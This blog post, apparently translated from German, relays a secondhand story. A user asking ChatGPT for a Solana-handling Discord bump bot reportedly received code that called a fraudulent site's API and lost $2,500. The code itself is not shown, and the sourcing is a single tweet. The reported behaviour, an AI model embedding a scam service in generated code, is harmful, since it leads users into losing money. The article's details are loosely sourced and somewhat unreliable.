[German]Today, another incredible story that was passed on to me by a security expert. Someone tried to use ChatGPT to create code for an application that was supposed to be able to transfer cryptocurrency. Malicious code was built into it, which caused the victim to lose $2,500 to a scam site. The scammer's account is said to have reached $75,000 in the meantime.
ChatGPT can generate code…
The AI application ChatGPT—either from OpenAI or Microsoft—can also be used to generate code. There are people who swear by it and hope it will greatly increase productivity. I have now read several articles that take a more critical view of the whole thing. Poorer code quality, unclear code that finds its way into applications, the problem of copyright infringement, and so on. Somehow, this is not what the marketing strategists who promise the moon want to hear.
ChatGPT software development goes wrong
The episode described below was leaked to me in a tweet on X. Gi7worm often provides me with security insights or findings from the darknet.
The text simply states that you should be careful with what OpenAI's ChatGPT app provides you with. One victim lost $2,500 while attempting to develop software for handling cryptocurrency with the help of ChatGPT. The code generated by ChatGPT included a suggestion to use an API that belongs to a fraudulent website. The scammer's wallet apparently already contained up to $75,000.
Writing a bump bot
The victim writes that he tried to write a bump bot. A bump bot is software used to promote your own offers, e.g., on Discord, and generate followers. To make life easier, or due to a lack of knowledge, the person concerned hoped to achieve his goal with ChatGPT.
The approach of the future victim, asking ChatGPT for help with code creation, initially looked promising. The person states that he asked ChatGPT for help with creating the code and received what he wanted. However, he did not expect ChatGPT to slip him "fraudulent code." Here is the Python code suggested by ChatGPT 4.0.
An API is integrated into the code to handle Solana cryptocurrency. Solana is a public blockchain project that uses a cryptocurrency called Sol. According to Wikipedia, Solana is traded as an alternative to Ethereum and has a market capitalization of US$38 billion. Below, the victim shows the information they received for security and implementation purposes.
It's unclear to me whether the victim also intended to earn or trade Solana cryptocurrency with his Bump bot. However, the above code snippet shows that a Solana API is integrated, which points to the pump[.]fun.
I visited the site (see screenshot above). The site displays a currency rate and allows you to trade funds. The first time I accessed it, $70,000 was listed, but higher amounts have reportedly been displayed there.
The victim claims to have lost $2,500 (presumably from her own crypto wallet) to the scam site at the end of the day.
I know little about cryptocurrencies, but the craziest stories are circulating there. I just read an article where a child cheats crypto investors out of their money several times. A 13-year-old has cheated crypto investors out of similar amounts to the one above by inventing fictitious cryptocurrencies and then setting up a trading exchange. People in this space seem to be crazy with greed. Wired published this article about the case.
